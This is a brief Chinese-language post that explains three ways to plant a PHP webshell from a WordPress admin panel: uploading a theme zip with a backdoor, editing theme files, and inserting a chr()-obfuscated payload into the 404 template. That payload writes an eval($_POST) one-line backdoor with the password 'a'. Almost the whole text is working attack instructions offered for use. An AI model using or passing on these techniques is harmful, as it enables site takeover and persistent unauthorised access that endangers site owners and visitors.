Wordpress后台拿WEBSHELL的方法

方法1：

本机建立目录“wawa”,把一句话1.php放进去。打包wawa目录为zip文件。WP后台的主题管理，上传主题，安装。则你的后门路径为：
wp-content\themes\wawa\1.php
 

方法2：

后台自带编辑功能，随便找个foot.php什么的往里面写马吧。
foot.php即使语法出错也不会把页面搞得乱七八糟。
你的方法就当做所在主题不是777权限的时候再说呗。

方法3：

WordPress3.0后台404页面可以自定义

“外观”-“编辑”-“404模板

<script language="php">fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(93).chr(41).chr(59).chr(63).chr(62));</script>
插到文件头
点404模板的时候地址栏有相对路径，默认是wp-content\themes\twentyten\404.php
更新完直接访问localhost\wp-content\themes\twentyten\404.php就会在twentyten目录生成一句话后门a.php 密码a

标签分类：